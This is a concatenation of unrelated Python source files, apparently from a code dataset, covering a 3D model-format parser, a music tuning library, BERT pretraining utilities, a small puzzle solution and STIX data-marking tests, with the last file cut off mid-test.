from PyMdlxConverter.parsers.mdlx.tokenstream import TokenStream
from PyMdlxConverter.parsers.mdlx.extent import Extent
from PyMdlxConverter.parsers.errors import TokenStreamError
class Sequence(object):
def __init__(self):
self.name = ''
self.interval = [0, 0]
self.move_speed = 0
self.flags = 0
self.rarity = 0
self.sync_point = 0
self.extent = Extent()
def read_mdx(self, stream: BinaryStream):
self.name = stream.read(80)
self.interval = stream.read_uint32_array(2)
self.move_speed = stream.read_float32()
self.flags = stream.read_uint32()
self.rarity = stream.read_float32()
self.sync_point = stream.read_uint32()
self.extent.read_mdx(stream)
def write_mdx(self, stream: BinaryStream):
stream.write(self.name)
stream.skip(80 - len(self.name))
stream.write_uint32_array(self.interval)
stream.write_float32(self.move_speed)
stream.write_uint32(self.flags)
stream.write_float32(self.rarity)
stream.write_uint32(self.sync_point)
self.extent.write_mdx(stream)
def read_mdl(self, stream: TokenStream):
self.name = stream.read()
for token in stream.read_block():
if token == 'Interval':
self.interval = stream.read_vector(2)
elif token == 'NonLooping':
self.flags = 1
elif token == 'MoveSpeed':
self.move_speed = stream.read_float()
elif token == 'Rarity':
self.rarity = stream.read_float()
elif token == 'MinimumExtent':
self.extent.min = stream.read_vector(3)
elif token == 'MaximumExtent':
self.extent.max = stream.read_vector(3)
elif token == 'BoundsRadius':
self.extent.bounds_radius = stream.read_float()
else:
raise TokenStreamError('Sequence', token)
def write_mdl(self, stream: TokenStream, version=None):
stream.start_object_block('Anim', self.name)
stream.write_vector_attrib('Interval', self.interval)
if self.flags == 1:
stream.write_flag('NonLooping')
if self.move_speed != 0:
stream.write_number_attrib('MoveSpeed', self.move_speed)
if self.rarity != 0:
stream.write_number_attrib('Rarity', self.rarity)
self.extent.write_mdl(stream)
stream.end_block()
| python |
import threading
from app.crawler.indeed_job_posting import IndeedJobPostingCrawler
from app.crawler.indeed_job_search_result import IndeedJobSearchResultCrawler
class CrawlerManager:
""" Crawler manager """
@classmethod
def start(cls):
crawlers = [
IndeedJobPostingCrawler(),
IndeedJobSearchResultCrawler(),
]
        for crawler in crawlers:
            t = threading.Thread(target=crawler.run, daemon=True)
            t.start()
| python |
#Code for acessment of the external coils at equatorial plane
#Andre Torres
#21-12-18
from getMirnov import *
%matplotlib qt4
#SDAS INFO
shotN=44835 #44409
ch_rad_u = 'MARTE_NODE_IVO3.DataCollection.Channel_141'
ch_vertical= 'MARTE_NODE_IVO3.DataCollection.Channel_142'
ch_rad_b = 'MARTE_NODE_IVO3.DataCollection.Channel_143'
#client.searchParametersByName("plasma")
#reference signals
primary, times_p,tbs=getSignal( 'MARTE_NODE_IVO3.DataCollection.Channel_093', shotN)
PF_vert, times_v,tbs=getSignal( ch_vertical, shotN)
density, times_rho,tbs=getSignal( "POST.PROCESSED.DENSITY", shotN)
times, mirnovs = getMirnovs(shotN,mirnv_corr,False)
mirnovs0=mirnovs[0]
#triple sadle
#ADC-Vs factor
vertScale = 1.7102e-4 / 2.0e6 # LSB to Volt * Sampling Period
rad_u, times,tbs=getSignal(ch_rad_u, shotN, vertScale)
rad_b, times,tbs=getSignal(ch_rad_b, shotN, vertScale)
vert, times,tbs=getSignal(ch_vertical, shotN, vertScale)
#save files for offline
np.save("dataFiles/FluxCoils/times", times)
np.save("dataFiles/FluxCoils/primary", primary)
np.save("dataFiles/FluxCoils/PF_vert", PF_vert)
np.save("dataFiles/FluxCoils/density", density)
np.save("dataFiles/FluxCoils/mirnovs0", mirnovs[0])
np.save("dataFiles/FluxCoils/rad_u", rad_u)
np.save("dataFiles/FluxCoils/rad_b", rad_b)
np.save("dataFiles/FluxCoils/vert", vert)
#load files
times=np.load("dataFiles/FluxCoils/times.npy")
primary=np.load("dataFiles/FluxCoils/primary.npy")
PF_vert=np.load("dataFiles/FluxCoils/PF_vert.npy")
density=np.load("dataFiles/FluxCoils/density.npy")
mirnovs0=np.load("dataFiles/FluxCoils/mirnovs0.npy")
rad_u=np.load("dataFiles/FluxCoils/rad_u.npy")
rad_b=np.load("dataFiles/FluxCoils/rad_b.npy")
vert=np.load("dataFiles/FluxCoils/vert.npy")
#Plot 3 signals
plt.figure()
plt.title("Pulse #"+str(shotN))
plt.ylabel("Flux [V.s]")
plt.xlabel("Time [ms]")
plt.plot(times*1e-3,rad_u*1e6, label="Upper radial")
plt.plot(times*1e-3,rad_b*1e6, label="Lower radial")
plt.plot(times*1e-3,vert*1e6, label="Vertical")
plt.tight_layout()
plt.legend()
plt.plot(times,-mirnovs[0]*max(vert)/max(mirnovs[0])*1e6)
plt.figure()
plt.plot(times,mirnovs[0])
plt.figure()
plt.plot(times_p, primary)
plt.plot(times_v, PF_vert)
| python |
import math, csv, re
def check_negative(freq):
if freq < 0:
raise ValueError("negative frequency")
def cent_diff(freq1, freq2):
"""Returns the difference between 2 frequencies in cents
Parameters
----------
freq1 : float
The first frequency
freq2 : float
The second frequency
Returns
-------
float
The difference between the 2 frequencies
"""
return 1200*math.log2(freq2/freq1)
def detune(freq, cents=0):
"""Detunes the desired frequency using cents
Parameters
----------
freq : float
The frequency
cents : float
The amount to detune in cents (accepts negative values)
Returns
-------
float
The detuned frequency
"""
check_negative(freq)
return freq*2**(cents/1200)
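# Illustrative examples: cent_diff(440, 880) == 1200.0 (one octave) and
# detune(440, 100) is roughly 466.16 Hz (one 12-EDO semitone above A4).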
def overtones(freq, n=16):
"""Returns the overtones of the desired frequency
Parameters
----------
freq : float
The frequency
n : int
The number of overtones to generate
Returns
-------
list
A list containing the frequency's overtones in ascending order
(the base frequency is included as the first element)
"""
check_negative(freq)
return [freq*i for i in range(1,n + 1)]
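# Illustrative example: overtones(110, 4) -> [110, 220, 330, 440], i.e. the
# fundamental of A2 plus its next three partials.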
def mirror(freq, freq_axis):
"""Returns the flipped frequency around the freq axis
Parameters
----------
freq : float
The frequency to flip
freq_axis : float
The the frequency to use as axis of the mirror
Returns
-------
float
The mirrored frequency
"""
check_negative(freq)
return freq_axis**2/freq
def ifreq(freq_axis, index, steps=12):
"""Returns a frequency using step and octave index
Parameters
----------
freq_axis : float
The frequency acting as the 'axis'
index : tuple
A 2-element tuple describing the distance of the desired frequency
from freq, where the first element is the number of steps and the
second is the number of octaves (accepts negative values)
steps : int
The number of equal steps to divide the octave (default is 12)
Returns
-------
float
a frequency based on EDO distance from freq
"""
check_negative(freq_axis)
return freq_axis*2**(index[0]/steps + index[1])
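# Illustrative examples (12 equal steps): ifreq(440, (3, 0)) is roughly 523.25 Hz
# (three steps above the axis) and ifreq(440, (0, -1)) == 220.0 (one octave below).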
def get_closest_midi_note(freq, cent_thresh):
"""Iterates the midi dict to find the item with smallest frequency difference,
determined by the cent threshold.
Parameters
----------
freq : float
The given frequency
cent_thresh : float
The cent threshold
Returns
-------
The midi note nearest to the given frequency
"""
for item in midi_dict.items():
if abs(cent_diff(freq, item[1])) <= cent_thresh:
return item
def get_midi(freq):
"""Returns a MIDI event representing the given frequency.
Microtonal frequencies will be slotted to the nearest MIDI note
with a pitch wheel value applied to it.
Parameters
----------
freq : float
The desired frequency
Returns
-------
A tuple consisting of the nearest MIDI note and pitch wheel value
(will be 0 if frequency is in Equal Temperament)
"""
max_wheel = 8191
max_cents = 200
ratio = max_wheel/max_cents
midi_num, midi_freq = get_closest_midi_note(freq, 50.1)
wheel = int(cent_diff(midi_freq, freq)*ratio)
return midi_num, wheel
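# Illustrative examples: get_midi(440) -> (69, 0), while a frequency 30 cents
# sharp of A4 maps to note 69 with a pitch-wheel value of roughly 1228.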
class EDO:
"""Equal Divisions of Octave; produces 'Notes' using step/octave indexing.
"""
def __init__(self, A4, steps=0, table=None, start=0):
"""Constructs an EDO either using steps or a table
(size of table determines total steps)
Parameters
----------
A4 : float
Concert pitch that is represented as A4 in western music
steps : int
Total steps to split octave into
table : list
A list of lists containing the different names for each note
start : int
The index of A4 in the table.
"""
self.A4 = A4
self.start = start
if table is not None:
size = len(table)
# move elements according to where the start is
if start != 0:
self.table = table[:start] + table[start:]
else:
self.table = table
self.dict = {n:i for i in range(size) for n in self.table[i]}
self.steps = size
elif steps != 0:
self.table = None
self.steps = steps
else:
raise ValueError('either table or steps must be specified')
def __getitem__(self, index):
# extract note name and octave if string
if isinstance(index, str):
if self.dict is None:
raise Exception('no dictionary defined in EDO')
split = re.findall(r"[A-Z][b#]?|\d", index)
# i : step index
i = self.dict[split[0]]
# j : octave index
j = int(split[1])
index = i, j
# nothing to do when tuple, just check if it isn't
elif not isinstance(index, tuple):
raise ValueError('invalid index type')
return Note(self, index)
def step_in_cents(self):
return cent_diff(self[0,4].freq(), self[1,4].freq())
def __str__(self):
return '<{}.{} steps={} A4={} at {}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.steps,
self.A4,
hex(id(self)))
def __repr__(self):
return str(self)
@staticmethod
def twelve(A4=440):
"""Returns 12 EDO
"""
return EDO(A4, table=table, start=9)
class Note:
"""Class representing notes. Can produce more notes using
the EDO used or using intervals.
"""
def __init__(self, edo, index):
self.edo = edo
self.index = index
self.start = 0
self.end = 0
self.velocity = 96
self.cents = 0
def names(self):
if self.edo is None or self.edo.table is None:
return []
return self.edo.table[self.index[0]]
def name(self):
if self.edo is None or self.edo.table is None:
return ''
return self.names()[0]
def A4(self):
return self.edo.A4
def detune(self, cents):
self.cents = cents
return self
def freq(self):
A4 = self.edo.A4
i = self.index[0] - self.edo.steps - self.edo.start
j = self.index[1] - 3
return detune(ifreq(A4, (i, j), self.edo.steps), self.cents)
def __getitem__(self, index):
"""Creates a new note based on index. The EDO and detuned cents are also passed.
Index: can be either int or tuple. int specifies
the steps from this note according to the EDO, tuple
also provides the octave.
Interval: by using float. Sets this note as the axis for the new note.
"""
if isinstance(index, (int, tuple)):
if isinstance(index, tuple):
i = self.index[0] + index[0]
j = self.index[1] + index[1]
else:
i = self.index[0] + index
j = self.index[1]
n_index = i%self.edo.steps, i//self.edo.steps + j
cents = 0
elif isinstance(index, float):
freq = self.freq()
cent_dist = cent_diff(freq, freq * index)
step_in_cents = self.edo.step_in_cents()
closest_i = round(round(cent_dist/step_in_cents))
i = self.index[0] + closest_i
j = self.index[1]
n_index = i%self.edo.steps, i//self.edo.steps + j
cents = cent_dist - closest_i*step_in_cents
else:
raise ValueError('invalid value for index/interval')
return Note(self.edo, n_index).detune(self.cents + cents)
def get_midi(self):
return get_midi(self.freq())
def __str__(self):
return '<{}.{} name(s)={}, index={}, ({}c) at {}>'.format(
self.__class__.__module__,
self.__class__.__name__,
self.names(),
self.index,
round(self.cents, 2),
hex(id(self)))
def __repr__(self):
return str(self)
import pathlib
filename = pathlib.Path(__file__).parent / '12edo.csv'
table = list(csv.reader(open(filename)))
midi_dict = {i : ifreq(440, (i -69, 0)) for i in range(128)}
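# Illustrative usage sketch; it only runs when the file is executed directly and
# assumes the bundled 12edo.csv note-name table is present and that "A" sits at
# the table index used by EDO.twelve().
if __name__ == "__main__":
    edo = EDO.twelve(A4=440)
    a4 = edo["A4"]             # look a note up by name and octave
    c5 = a4[3]                 # 3 steps (semitones) above A4
    fifth = a4[1.5]            # nearest tempered note to a 3:2 ratio, detuned in cents
    print(a4.freq(), c5.freq(), fifth.freq(), round(fifth.cents, 2))
    print(a4.get_midi())       # MIDI note number plus pitch-wheel offset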
| python |
import itertools
N = int(input())
pairs = []
for x in range(N):
input_ = input().split()
pairs.append([input_[0], input_[len(input_)-1]])
random = ['Beatrice', 'Sue', 'Belinda', 'Bessie', 'Betsy', 'Blue', 'Bella', 'Buttercup']
perm = list(itertools.permutations(random))
possible_list = []
for x in range(len(perm)):
possible = True
temp = perm[x]
for y in range(len(pairs)):
pair = pairs[y]
first = pair[0]
second = pair[1]
if temp.index(first) + 1 == temp.index(second) or temp.index(first) - 1 == temp.index(second):
continue
else:
possible = False
break
if possible == True:
possible_list.append(temp)
minimum = min(possible_list)
for x in minimum:
print(x) | python |
""" written by Joel
file from previous assignment with some changes to fit the new one
contains all the magic numbers for the boid class created in the Pacman game
"""
import numpy as np
# if True the objects that passes through the screen will
# appear on a random spot on the other side.
RANDOM_MODE = False
# screen settings
SCREEN_WIDTH = 1080
SCREEN_HIGHT = 720
SCREEN_RESOLUTION = (SCREEN_WIDTH, SCREEN_HIGHT)
FPS = 30
BACKGROUNG_COLOR_MIN = 15
BACKGROUNG_COLOR_MAX = 75
# characters settings
# maxSpeed, color, position, radius, width, height
BOID_SPEC = (10, (255,255,55), 5, 20,10)
MIN_BOIDFLOCK = 2
COLLITION_RADIUS = 20
FLOCK_RADIUS = 80
PREADATOR_RADIUS = 150
# maxSpeed, color, position, radius, width, height
PACMAN_SPEC = (15, (255,255,255), 15, 20,10)
PACMAN_START_POS = (500,500)
PACMAN_SIGHT = 250
GHOST_SPEC = (5 , (255,255,255), 50, 20,10)
GHOST_START_POS = [(100,100),(100,700),(700,100),(700,700)]
GHOST_DAMPING = 0.5
# color, radius, width, height
OBSTACLE_SPEC = ((255,55,55), 25, 50, 50)
| python |
# Generated by Django 2.1.7 on 2019-04-01 15:18
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('webapp', '0039_auto_20190317_1533'),
('webapp', '0040_merge_20190312_1600'),
]
operations = [
]
| python |
import logging
import random
import numpy as np
from transformers import BertConfig
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
logger = logging.getLogger(__name__)
class InputFeatures(object):
"""A single set of original_features of data."""
def __init__(self, input_ids, input_mask, segment_ids, is_next, lm_label_ids):
self.input_ids = input_ids
self.input_mask = input_mask
self.segment_ids = segment_ids
self.is_next = is_next
self.lm_label_ids = lm_label_ids
class InputExample(object):
"""A single training/test example for the language model."""
def __init__(self, guid, tokens_a, tokens_b=None, is_next=None, lm_labels=None):
"""Constructs a InputExample.
Args:
guid: Unique id for the example.
tokens_a: string. The untokenized text of the first sequence. For single
sequence tasks, only this sequence must be specified.
tokens_b: (Optional) string. The untokenized text of the second sequence.
Only must be specified for sequence pair tasks.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.guid = guid
self.tokens_a = tokens_a
self.tokens_b = tokens_b
self.is_next = is_next # nextSentence
self.lm_labels = lm_labels # masked words for language model
def unmask_lm_labels(input_ids, masked_lm_labels):
"""
Get unmasked LM labels
"""
input_ids = np.asarray(input_ids)
masked_lm_labels = np.asarray(masked_lm_labels)
inp_shape = input_ids.shape
unmasked_lm_labels = np.copy(input_ids.flatten())
masked_token_indices = np.where(masked_lm_labels.flatten() != -1)[0]
masked_tokens = masked_lm_labels.flatten()[masked_token_indices]
unmasked_lm_labels[masked_token_indices] = masked_tokens
unmasked_lm_labels = unmasked_lm_labels.reshape(inp_shape)
return unmasked_lm_labels
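# For example, input_ids = [7, 103, 9] with masked_lm_labels = [-1, 42, -1]
# (position 1 was masked, original id 42) yields unmasked_lm_labels = [7, 42, 9].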
def get_seq_lengths(single_seq_len, is_same):
if is_same:
        # when there are two sequences, max_seq_length is double and accounts for BERT adding [CLS], [SEP], [SEP]
total_seq_len = single_seq_len * 2
else:
# Account for BERT adding [CLS], [SEP]
total_seq_len = single_seq_len
single_seq_len -= 2
return single_seq_len, total_seq_len
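# For example, get_seq_lengths(128, is_same=True) returns (128, 256), while
# get_seq_lengths(128, is_same=False) returns (126, 128): the single sequence
# gives up two positions to [CLS] and [SEP].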
def random_word(tokens, tokenizer, inference_mode: bool = False):
"""
Masking some random tokens for Language Model task with probabilities as in the original BERT paper.
Args:
tokens: list of str, tokenized sentence.
        tokenizer: Tokenizer, object used for tokenization (we need its vocab here)
inference_mode: if True, don't do any input modifications. Used at inference time.
Returns
tokens: masked tokens
output_label: labels for LM prediction
"""
output_label = []
for i in range(len(tokens)):
prob = random.random()
# mask token with 15% probability
if prob < 0.15 and not inference_mode:
prob /= 0.15
# 80% randomly change token to mask token
if prob < 0.8:
token = '[MASK]'
# 10% randomly change token to random token
elif prob < 0.9:
token = random.choice(list(tokenizer.token_to_idx.items()))[0]
while (token in tokenizer.symbols) or (token == tokens[i]):
token = random.choice(list(tokenizer.token_to_idx.items()))[0]
# -> rest 10% randomly keep current token
else:
token = tokens[i]
# set the replace token and append token to output (we will predict these later)
try:
output_label.append(tokenizer.token_to_idx[tokens[i]])
tokens[i] = token
except KeyError:
# For unknown words (should not occur with BPE vocab)
output_label.append(tokenizer.token_to_idx['[UNK]'])
logger.warning('Cannot find token "{}" in token_to_idx. Using [UNK] instead'.format(tokens[i]))
else:
# no masking token (will be ignored by loss function later)
output_label.append(-1)
return tokens, output_label
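# A hedged usage sketch; ToyTokenizer is a made-up stand-in exposing only the
# `token_to_idx` and `symbols` attributes that random_word relies on:
#
#   class ToyTokenizer:
#       def __init__(self):
#           self.symbols = ['[CLS]', '[SEP]', '[MASK]', '[UNK]']
#           vocab = self.symbols + ['hello', 'world', 'foo']
#           self.token_to_idx = {tok: i for i, tok in enumerate(vocab)}
#
#   tokens, labels = random_word(['hello', 'world', 'foo'], ToyTokenizer())
#   # Roughly 15% of positions are replaced (80% [MASK], 10% random, 10% kept);
#   # every touched position carries its original token id in `labels`, all
#   # untouched positions carry -1.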
def convert_example_to_features(example, max_seq_length, tokenizer, inference_mode: bool = False):
"""
Convert a raw sample (pair of sentences as tokenized strings) into a proper training sample with
IDs, LM labels, input_mask, CLS and SEP tokens etc.
Args:
example: InputExample, containing sentence input as strings and is_next label
max_seq_length: maximum length of sequence.
tokenizer: Tokenizer
inference_mode: if True, don't do any input modifications. Used at inference time.
Returns:
features: InputFeatures, containing all inputs and labels of one sample as IDs (as used for model training)
"""
tokens_a = example.tokens_a
tokens_b = example.tokens_b
if tokens_b is None:
tokens_b = []
tokens_a, t1_label = random_word(tokens_a, tokenizer, inference_mode)
tokens_b, t2_label = random_word(tokens_b, tokenizer, inference_mode)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = [-1] + t1_label + [-1] + (t2_label + [-1] if len(t2_label) > 0 else [])
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where 'type_ids' are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
    # used as the 'sentence vector'. Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
segment_ids = []
tokens.append('[CLS]')
segment_ids.append(0)
for token in tokens_a:
tokens.append(token)
segment_ids.append(0)
tokens.append('[SEP]')
segment_ids.append(0)
if len(tokens_b) > 0:
for token in tokens_b:
tokens.append(token)
segment_ids.append(1)
tokens.append('[SEP]')
segment_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
# Zero-pad up to the sequence length.
while len(input_ids) < max_seq_length:
input_ids.append(0)
input_mask.append(0)
segment_ids.append(0)
lm_label_ids.append(-1)
assert len(input_ids) == max_seq_length
assert len(input_mask) == max_seq_length
assert len(segment_ids) == max_seq_length
assert len(lm_label_ids) == max_seq_length
# if example.guid < 5:
# logger.info('*** Example ***')
# logger.info('guid: %s' % example.guid)
# logger.info('tokens: %s' % ' '.join([str(x) for x in tokens]))
# logger.info('input_ids: %s' % ' '.join([str(x) for x in input_ids]))
# logger.info('input_mask: %s' % ' '.join([str(x) for x in input_mask]))
# logger.info('segment_ids: %s' % ' '.join([str(x) for x in segment_ids]))
# logger.info('LM label: %s ' % lm_label_ids)
# logger.info('Is next sentence label: %s ' % example.is_next)
features = InputFeatures(
input_ids=input_ids,
input_mask=input_mask,
segment_ids=segment_ids,
lm_label_ids=lm_label_ids,
is_next=example.is_next,
)
return features
def _truncate_seq_pair(tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
class BertConfigExtras(BertConfig):
"""
Same as BertConfig, BUT
adds any kwarg as a member field
"""
def __init__(
self,
vocab_size_or_config_json_file,
hidden_size=768,
num_hidden_layers=12,
num_attention_heads=12,
intermediate_size=3072,
hidden_act="gelu",
hidden_dropout_prob=0.1,
attention_probs_dropout_prob=0.1,
max_position_embeddings=512,
type_vocab_size=2,
initializer_range=0.02,
**kwargs,
):
super(BertConfigExtras, self).__init__(
vocab_size_or_config_json_file,
hidden_size=hidden_size,
num_hidden_layers=num_hidden_layers,
num_attention_heads=num_attention_heads,
intermediate_size=intermediate_size,
hidden_act=hidden_act,
hidden_dropout_prob=hidden_dropout_prob,
attention_probs_dropout_prob=attention_probs_dropout_prob,
max_position_embeddings=max_position_embeddings,
type_vocab_size=type_vocab_size,
initializer_range=initializer_range,
)
for k, v in kwargs.items():
setattr(self, k, v)
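# Hedged usage sketch: any extra keyword argument simply becomes an attribute
# on the config object (the names below are illustrative only):
#
#   config = BertConfigExtras(vocab_size_or_config_json_file=30000,
#                             hidden_size=256,
#                             num_binding_layers=2)
#   config.num_binding_layers   # -> 2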
| python |
import pytest
from stix2 import TLP_AMBER, Malware, exceptions, markings
from .constants import FAKE_TIME, MALWARE_ID
from .constants import MALWARE_KWARGS as MALWARE_KWARGS_CONST
from .constants import MARKING_IDS
"""Tests for the Data Markings API."""
MALWARE_KWARGS = MALWARE_KWARGS_CONST.copy()
MALWARE_KWARGS.update({
'id': MALWARE_ID,
'created': FAKE_TIME,
'modified': FAKE_TIME,
})
@pytest.mark.parametrize("data", [
(
Malware(**MALWARE_KWARGS),
Malware(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MARKING_IDS[0],
),
(
MALWARE_KWARGS,
dict(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MARKING_IDS[0],
),
(
Malware(**MALWARE_KWARGS),
Malware(object_marking_refs=[TLP_AMBER.id],
**MALWARE_KWARGS),
TLP_AMBER,
),
])
def test_add_markings_one_marking(data):
before = data[0]
after = data[1]
before = markings.add_markings(before, data[2], None)
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
def test_add_markings_multiple_marking():
before = Malware(
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1]],
**MALWARE_KWARGS
)
before = markings.add_markings(before, [MARKING_IDS[0], MARKING_IDS[1]], None)
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
def test_add_markings_combination():
before = Malware(
**MALWARE_KWARGS
)
after = Malware(
object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1]],
granular_markings=[
{
"selectors": ["labels"],
"marking_ref": MARKING_IDS[2]
},
{
"selectors": ["name"],
"marking_ref": MARKING_IDS[3]
}
],
**MALWARE_KWARGS
)
before = markings.add_markings(before, MARKING_IDS[0], None)
before = markings.add_markings(before, MARKING_IDS[1], None)
before = markings.add_markings(before, MARKING_IDS[2], "labels")
before = markings.add_markings(before, MARKING_IDS[3], "name")
for m in before["granular_markings"]:
assert m in after["granular_markings"]
for m in before["object_marking_refs"]:
assert m in after["object_marking_refs"]
@pytest.mark.parametrize("data", [
([""]),
(""),
([]),
([MARKING_IDS[0], 456])
])
def test_add_markings_bad_markings(data):
before = Malware(
**MALWARE_KWARGS
)
with pytest.raises(exceptions.InvalidValueError):
before = markings.add_markings(before, data, None)
assert "object_marking_refs" not in before
GET_MARKINGS_TEST_DATA = \
{
"a": 333,
"b": "value",
"c": [
17,
"list value",
{
"g": "nested",
"h": 45
}
],
"x": {
"y": [
"hello",
88
],
"z": {
"foo1": "bar",
"foo2": 65
}
},
"object_marking_refs": ["11"],
"granular_markings": [
{
"marking_ref": "1",
"selectors": ["a"]
},
{
"marking_ref": "2",
"selectors": ["c"]
},
{
"marking_ref": "3",
"selectors": ["c.[1]"]
},
{
"marking_ref": "4",
"selectors": ["c.[2]"]
},
{
"marking_ref": "5",
"selectors": ["c.[2].g"]
},
{
"marking_ref": "6",
"selectors": ["x"]
},
{
"marking_ref": "7",
"selectors": ["x.y"]
},
{
"marking_ref": "8",
"selectors": ["x.y.[1]"]
},
{
"marking_ref": "9",
"selectors": ["x.z"]
},
{
"marking_ref": "10",
"selectors": ["x.z.foo2"]
},
]
}
@pytest.mark.parametrize("data", [GET_MARKINGS_TEST_DATA])
def test_get_markings_object_marking(data):
assert set(markings.get_markings(data, None)) == set(["11"])
@pytest.mark.parametrize("data", [GET_MARKINGS_TEST_DATA])
def test_get_markings_object_and_granular_combinations(data):
"""Test multiple combinations for inherited and descendant markings."""
assert set(markings.get_markings(data, "a", False, False)) == set(["1"])
assert set(markings.get_markings(data, "a", True, False)) == set(["1", "11"])
assert set(markings.get_markings(data, "a", True, True)) == set(["1", "11"])
assert set(markings.get_markings(data, "a", False, True)) == set(["1"])
assert set(markings.get_markings(data, "b", False, False)) == set([])
assert set(markings.get_markings(data, "b", True, False)) == set(["11"])
assert set(markings.get_markings(data, "b", True, True)) == set(["11"])
assert set(markings.get_markings(data, "b", False, True)) == set([])
assert set(markings.get_markings(data, "c", False, False)) == set(["2"])
assert set(markings.get_markings(data, "c", True, False)) == set(["2", "11"])
assert set(markings.get_markings(data, "c", True, True)) == set(["2", "3", "4", "5", "11"])
assert set(markings.get_markings(data, "c", False, True)) == set(["2", "3", "4", "5"])
assert set(markings.get_markings(data, "c.[0]", False, False)) == set([])
assert set(markings.get_markings(data, "c.[0]", True, False)) == set(["2", "11"])
assert set(markings.get_markings(data, "c.[0]", True, True)) == set(["2", "11"])
assert set(markings.get_markings(data, "c.[0]", False, True)) == set([])
assert set(markings.get_markings(data, "c.[1]", False, False)) == set(["3"])
assert set(markings.get_markings(data, "c.[1]", True, False)) == set(["2", "3", "11"])
assert set(markings.get_markings(data, "c.[1]", True, True)) == set(["2", "3", "11"])
assert set(markings.get_markings(data, "c.[1]", False, True)) == set(["3"])
assert set(markings.get_markings(data, "c.[2]", False, False)) == set(["4"])
assert set(markings.get_markings(data, "c.[2]", True, False)) == set(["2", "4", "11"])
assert set(markings.get_markings(data, "c.[2]", True, True)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2]", False, True)) == set(["4", "5"])
assert set(markings.get_markings(data, "c.[2].g", False, False)) == set(["5"])
assert set(markings.get_markings(data, "c.[2].g", True, False)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2].g", True, True)) == set(["2", "4", "5", "11"])
assert set(markings.get_markings(data, "c.[2].g", False, True)) == set(["5"])
assert set(markings.get_markings(data, "x", False, False)) == set(["6"])
assert set(markings.get_markings(data, "x", True, False)) == set(["6", "11"])
assert set(markings.get_markings(data, "x", True, True)) == set(["6", "7", "8", "9", "10", "11"])
assert set(markings.get_markings(data, "x", False, True)) == set(["6", "7", "8", "9", "10"])
assert set(markings.get_markings(data, "x.y", False, False)) == set(["7"])
assert set(markings.get_markings(data, "x.y", True, False)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y", True, True)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y", False, True)) == set(["7", "8"])
assert set(markings.get_markings(data, "x.y.[0]", False, False)) == set([])
assert set(markings.get_markings(data, "x.y.[0]", True, False)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y.[0]", True, True)) == set(["6", "7", "11"])
assert set(markings.get_markings(data, "x.y.[0]", False, True)) == set([])
assert set(markings.get_markings(data, "x.y.[1]", False, False)) == set(["8"])
assert set(markings.get_markings(data, "x.y.[1]", True, False)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y.[1]", True, True)) == set(["6", "7", "8", "11"])
assert set(markings.get_markings(data, "x.y.[1]", False, True)) == set(["8"])
assert set(markings.get_markings(data, "x.z", False, False)) == set(["9"])
assert set(markings.get_markings(data, "x.z", True, False)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z", True, True)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z", False, True)) == set(["9", "10"])
assert set(markings.get_markings(data, "x.z.foo1", False, False)) == set([])
assert set(markings.get_markings(data, "x.z.foo1", True, False)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z.foo1", True, True)) == set(["6", "9", "11"])
assert set(markings.get_markings(data, "x.z.foo1", False, True)) == set([])
assert set(markings.get_markings(data, "x.z.foo2", False, False)) == set(["10"])
assert set(markings.get_markings(data, "x.z.foo2", True, False)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z.foo2", True, True)) == set(["6", "9", "10", "11"])
assert set(markings.get_markings(data, "x.z.foo2", False, True)) == set(["10"])
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
Malware(**MALWARE_KWARGS),
),
(
dict(object_marking_refs=[MARKING_IDS[0]],
**MALWARE_KWARGS),
MALWARE_KWARGS,
),
])
def test_remove_markings_object_level(data):
before = data[0]
after = data[1]
before = markings.remove_markings(before, MARKING_IDS[0], None)
assert 'object_marking_refs' not in before
assert 'object_marking_refs' not in after
modified = after['modified']
after = markings.remove_markings(after, MARKING_IDS[0], None)
    assert modified == after['modified']
@pytest.mark.parametrize("data", [
(
Malware(object_marking_refs=[MARKING_IDS[0], MARKING_IDS[1], MARKING_IDS[2]],
**MALWARE_KWARGS),
